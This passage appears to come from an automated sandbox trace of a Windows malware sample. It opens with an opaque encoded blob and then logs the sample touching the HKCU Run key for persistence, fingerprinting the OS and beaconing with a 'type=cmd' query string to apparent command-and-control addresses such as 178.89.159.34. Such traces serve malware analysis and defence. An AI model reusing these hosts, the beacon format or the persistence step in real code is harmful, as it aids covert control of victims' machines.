1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0132.287] RegCloseKey (hKey=0x248) returned 0x0 [0132.287] Sleep (dwMilliseconds=0x1388) Thread: id = 42 os_tid = 0x310 [0092.225] _alloca_probe () returned 0x1e61b05 [0092.225] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x44ee948, lpdwDisposition=0x0 | out: phkResult=0x44ee948*=0xa8, lpdwDisposition=0x0) returned 0x0 [0092.225] NtCreateKey (in: KeyHandle=0x44ee94c, DesiredAccess=0xf013f, ObjectAttributes=0x44ee924*(Length=0x18, RootDirectory=0xa8, ObjectName="\x01", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x44ee94c*=0x44) returned 0x0 [0092.225] RegQueryValueExA (in: hKey=0x44, lpValueName="s", lpReserved=0x0, lpType=0x0, lpData=0x44eea78, lpcbData=0x44ee96c*=0x1000 | out: lpType=0x0, lpData=0x44eea78*=0x0, lpcbData=0x44ee96c*=0x1000) returned 0x2 [0092.225] RegCloseKey (hKey=0x44) returned 0x0 [0092.225] RegCloseKey (hKey=0xa8) returned 0x0 [0092.225] GetVersionExA (in: lpVersionInformation=0x44ee68c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x44ee68c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.225] _snprintf (in: _Dest=0x44ee73c, _Count=0x103, _Format="%1d.%1d.%04d_%1d.%1d" | out: _Dest="6.1.7601_1.0") returned 12 [0092.225] GetModuleHandleA (lpModuleName="kernel32") returned 0x76f00000 [0092.225] GetProcAddress (hModule=0x76f00000, lpProcName="IsWow64Process") returned 0x76f1195e [0092.225] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x44ee724 | out: Wow64Process=0x44ee724) returned 1 [0092.225] _snprintf (in: _Dest=0x44ee844, _Count=0x103, _Format="type=cmd&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s" | out: _Dest="type=cmd&version=1.0&aid=8&builddate=060414&id=0187481c69&os=6.1.7601_1.0_64") returned 76 [0092.225] GetTickCount () returned 0x5b96 [0092.226] RtlRandom (in: Seed=0x44ee718 | out: Seed=0x44ee718) returned 0x4db405d8 [0092.226] _alloca_probe () returned 0x1e62190 [0092.226] _vsnprintf (in: string=0x44ea718, count=0x1000, format="http://%s/q", ap=0x44ee72c | out: string="http://178.89.159.34/q") returned 22 [0092.226] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x44ea588 | out: lpWSAData=0x44ea588) returned 0 [0092.235] InternetCrackUrlA (in: lpszUrl="http://178.89.159.34/q", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x44ea54c | out: lpUrlComponents=0x44ea54c) returned 1 [0092.477] socket (af=2, type=1, protocol=6) returned 0x1c8 [0092.501] gethostbyname (name="178.89.159.34") returned 0x834898*(h_name="178.89.159.34", h_aliases=0x8348a8*=(), h_addrtype=2, h_length=4, h_addr_list=0x8348ac*=([0]="178.89.159.34")) [0092.937] connect (s=0x1c8, name=0x44ea53c*(sa_family=2, sin_port=0x50, sin_addr="178.89.159.34"), namelen=16) returned -1 [0114.002] closesocket (s=0x1c8) returned 0 [0114.003] GetVersionExA (in: lpVersionInformation=0x44ee68c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x44ee68c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0114.003] _snprintf (in: _Dest=0x44ee73c, _Count=0x103, _Format="%1d.%1d.%04d_%1d.%1d" | out: _Dest="6.1.7601_1.0") returned 12 [0114.003] GetModuleHandleA (lpModuleName="kernel32") returned 0x76f00000 [0114.004] GetProcAddress (hModule=0x76f00000, lpProcName="IsWow64Process") returned 0x76f1195e [0114.004] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x44ee724 | out: Wow64Process=0x44ee724) returned 1 [0114.004] _snprintf (in: _Dest=0x44ee844, _Count=0x103, _Format="type=cmd&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s" | out: _Dest="type=cmd&version=1.0&aid=8&builddate=060414&id=0187481c69&os=6.1.7601_1.0_64") returned 76 [0114.004] GetTickCount () returned 0xb099 [0114.004] RtlRandom (in: Seed=0x44ee718 | out: Seed=0x44ee718) returned 0x9b0091c [0114.004] _alloca_probe () returned 0x1e62190 [0114.004] _vsnprintf (in: string=0x44ea718, count=0x1000, format="http://%s/q", ap=0x44ee72c | out: string="http://178.89.159.35/q") returned 22 [0114.004] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x44ea588 | out: lpWSAData=0x44ea588) returned 0 [0114.004] InternetCrackUrlA (in: lpszUrl="http://178.89.159.35/q", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x44ea54c | out: lpUrlComponents=0x44ea54c) returned 1 [0114.004] socket (af=2, type=1, protocol=6) returned 0x1c8 [0114.005] gethostbyname (name="178.89.159.35") returned 0x834898*(h_name="178.89.159.35", h_aliases=0x8348a8*=(), h_addrtype=2, h_length=4, h_addr_list=0x8348ac*=([0]="178.89.159.35")) [0114.015] connect (s=0x1c8, name=0x44ea53c*(sa_family=2, sin_port=0x50, sin_addr="178.89.159.35"), namelen=16) Thread: id = 43 os_tid = 0x740 Thread: id = 44 os_tid = 0x47c Thread: id = 45 os_tid = 0x480